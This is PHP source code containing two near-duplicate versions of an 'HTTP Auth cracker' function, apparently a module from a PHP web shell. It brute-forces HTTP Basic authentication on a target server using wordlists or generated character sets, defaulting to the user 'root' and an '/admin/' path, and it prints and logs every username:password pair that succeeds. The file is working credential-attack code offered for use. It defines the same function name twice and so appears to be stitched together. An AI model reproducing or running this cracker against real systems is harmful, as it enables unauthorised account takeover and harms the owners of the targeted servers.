function authcrackeR()
{
global $errorbox, $et, $t, $hcwd;
if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])) {
if (isset($_REQUEST['loG']) && !empty($_REQUEST['logfilE'])) {
$log = 1;
$file = $_REQUEST['logfilE'];
} else {
$log = 0;
}
$data = '';
$method = $_REQUEST['method'] ? 'POST' : 'GET';
if (strstr($_REQUEST['target'], '?')) {
$data = substr($_REQUEST['target'], strpos($_REQUEST['target'], '?') + 1);
$_REQUEST['target'] = substr($_REQUEST['target'], 0, strpos($_REQUEST['target'], '?'));
}
spliturL($_REQUEST['target'], $host, $page);
$type = $_REQUEST['combo'];
$user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : '';
if ($method == 'GET') {
$page .= $data;
}
$dictionary = fopen($_REQUEST['dictionary'], 'r');
echo '<font color=blue>';
while (!feof($dictionary)) {
if ($type) {
$combo = trim(fgets($dictionary), " \n\r");
$user = substr($combo, 0, strpos($combo, ':'));
$pass = substr($combo, strpos($combo, ':') + 1);
} else {
$pass = trim(fgets($dictionary), " \n\r");
}
$so = fsockopen($host, 80, $en, $es, 5);
if (!$so) {
echo "{$errorbox} Can not connect to host{$et}";
break;
} else {
$packet = "{$method} /{$page} HTTP/1.0\r\nAccept-Encoding: text\r\nHost: {$host}\r\nReferer: {$host}\r\nConnection: Close\r\nAuthorization: Basic " . base64_encode("{$user}:{$pass}");
if ($method == 'POST') {
$packet .= 'Content-Type: application/x-www-form-urlencoded\\r\\nContent-Length: ' . strlen($data);
}
$packet .= "\r\n\r\n";
$packet .= $data;
fputs($so, $packet);
$res = substr(fgets($so), 9, 2);
fclose($so);
if ($res == '20') {
echo "U: {$user} P: {$pass}</br>";
if ($log) {
file_add_contentS($file, "U: {$user} P: {$pass}\r\n");
}
}
}
}
echo 'Done!</font>';
} else {
echo "<center><form method='POST' name=form>{$t}HTTP Auth cracker:</td><td bgcolor='#333333'><select name=method><option value=1>POST</option><option value=0>GET</option></select></td></tr><tr><td width='20%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666'><input type=text name=dictionary size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Dictionary type:</td><td bgcolor='#808080'><input type=radio name=combo checked value=0 onClick='document.form.user.disabled = false;' style='border-width:1px;background-color:#808080;'>Simple (P)<input type=radio value=1 name=combo onClick='document.form.user.disabled = true;' style='border-width:1px;background-color:#808080;'>Combo (U:P)</td></tr><tr><td width='20%' bgcolor='#666666'>Username:</td><td bgcolor='#666666'><input type=text size=35 value=root name=user></td></tr><tr><td width='20%' bgcolor='#808080'>Server:</td><td bgcolor='#808080'><input type=text name=target value=localhost size=35></td></tr><tr><td width='20%' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='" . whereistmP() . DIRECTORY_SEPARATOR . ".log'> {$hcwd} <input class=buttons type=submit value=Start></form>{$et}</center>";
}
}
function authcrackeR()
{
global $hcwd;
if (!empty($_REQUEST['target'])) {
if (isset($_REQUEST['loG']) && !empty($_REQUEST['logfilE'])) {
$log = 1;
$file = $_REQUEST['logfilE'];
} else {
$log = 0;
}
$data = '';
$method = $_REQUEST['method'] ? 'POST' : 'GET';
if (strstr($_REQUEST['target'], '?')) {
$data = substr($_REQUEST['target'], strpos($_REQUEST['target'], '?') + 1);
$_REQUEST['target'] = substr($_REQUEST['target'], 0, strpos($_REQUEST['target'], '?'));
}
$u = parse_url($_REQUEST['target']);
$host = $u['host'];
$page = $u['path'];
$type = $_REQUEST['combo'];
$user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : '';
if ($method == 'GET') {
$page .= $data;
}
echo '<font color=#FA0>';
if ($_REQUEST['mode'] == 'wl') {
$dictionary = fopen($_REQUEST['dictionary'], 'r');
while (!feof($dictionary)) {
if ($type) {
$combo = trim(fgets($dictionary), " \n\r");
$user = substr($combo, 0, strpos($combo, ':'));
$pass = substr($combo, strpos($combo, ':') + 1);
} else {
$pass = trim(fgets($dictionary), " \n\r");
}
$so = @fsockopen($host, 80, $en, $es, 5);
if (!$so) {
echo "Can not connect to host";
break;
} else {
$packet = "{$method} {$page} HTTP/1.0\r\nAccept-Encoding: text\r\nHost: {$host}\r\nReferer: {$host}\r\nConnection: Close\r\nAuthorization: Basic " . base64_encode("{$user}:{$pass}");
if ($method == 'POST') {
$packet .= 'Content-Type: application/x-www-form-urlencoded\\r\\nContent-Length: ' . strlen($data);
}
$packet .= "\r\n\r\n";
$packet .= $data;
fputs($so, $packet);
$res = substr(fgets($so), 9, 2);
fclose($so);
if ($res == '20') {
echo "U: {$user} P: {$pass}</br>";
if ($log) {
file_add_contentS($file, "U: {$user} P: {$pass}\r\n");
}
}
}
}
} else {
$code = '
$so = @fsockopen ( "' . $host . '", 80, $en, $es, 5 );
$packet = "' . $method . " {$page} " . 'HTTP/1.0\\r\\nAccept-Encoding: text\\r\\nHost: ' . $host . '\\r\\nReferer: ' . $host . '\\r\\nConnection: Close\\r\\nAuthorization: Basic "
. base64_encode ( "' . $user . ':".$word )."\\r\\n"';
if ($method == "POST") {
$code .= ".'Content-Type: application/x-www-form-urlencoded\r\nContent-Length: " . strlen("'{$data}'") . "'";
}
$code .= "\r\n\r\n" . $data . ';fputs ( $so, $packet ); $test= ( substr ( fgets ( $so ), 9, 2 ) == "20");';
echo $code;
if ($res = brute($_REQUEST['mode'], $_REQUEST['min'], $_REQUEST['max'], $code) != null) {
echo "<b>{$user}:{$res}</b><br />";
}
}
echo 'Done!</font>';
} else {
echo '
<form name=cracker method="POST">
<div class="fieldwrapper">
<label class="styled" style="width:320px">HTTP Auth cracker</label>
</div><div class="fieldwrapper">
<label class="styled">Target:</label>
<div class="thefield">
<input type="url" name="target" value="http://' . getenv('HTTP_HOST') . '/admin/" size="30" />
</div>
</div>
<div class="fieldwrapper"><label class="styled">Input:</label><div class="thefield">
<select name="mode" id="mode" onChange="toggle()">
<option value="09">Bruteforce [0-9]</option>
<option value="az">Bruteforce [a-z]</option>
<option value="az09">Bruteforce [a-z] [0-9]</option>
<option value="az09AZ">Bruteforce [a-z] [A-Z] [0-9]</option>
<option value="all">Bruteforce [ALL]</option>
<option value="wl">Wordlist</option>
</select>
</div></div>
<div class="fieldwrapper" id="dic">
<label class="styled">Dictionary:</label>
<div class="thefield">
<input type="text" name="dictionary" size="30" />
</div>
</div><div class="fieldwrapper" id="fcr">
<label class="styled">Dictionary type:</label>
<div class="thefield">
<ul style="margin-top:0;">
<li><input type="radio" value="0" checked name="combo" onClick="document.cracker.user.disabled = false;" /> <label>Simple (P)</label></li>
<li><input type="radio" name="combo" value="1" onClick="document.cracker.user.disabled = true;" /> <label>Combo (U:P)</label></li>
</ul>
</div>
</div>
<div class="fieldwrapper">
<label class="styled">Method:</label>
<div class="thefield">
<select name="method"><option selected value="1">POST</option><option value="0">GET</option></select>
</div>
</div><div class="fieldwrapper">
<label class="styled">Username:</label>
<div class="thefield">
<input type="text" name="user" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled"><input type=checkbox name=loG value=1 onClick="document.cracker.logfilE.disabled = !document.cracker.logfilE.disabled;" checked> Log:</label>
<div class="thefield">
<input type=text name=logfilE size=25 value="' . whereistmP() . DIRECTORY_SEPARATOR . '.log">
</div>
</div>
' . $hcwd . '
<div class="buttonsdiv">
<input type="submit" name="start" value="Start" style="margin-left: 150px;" />
</div>
</form><script>toggle();</script>';
}
}
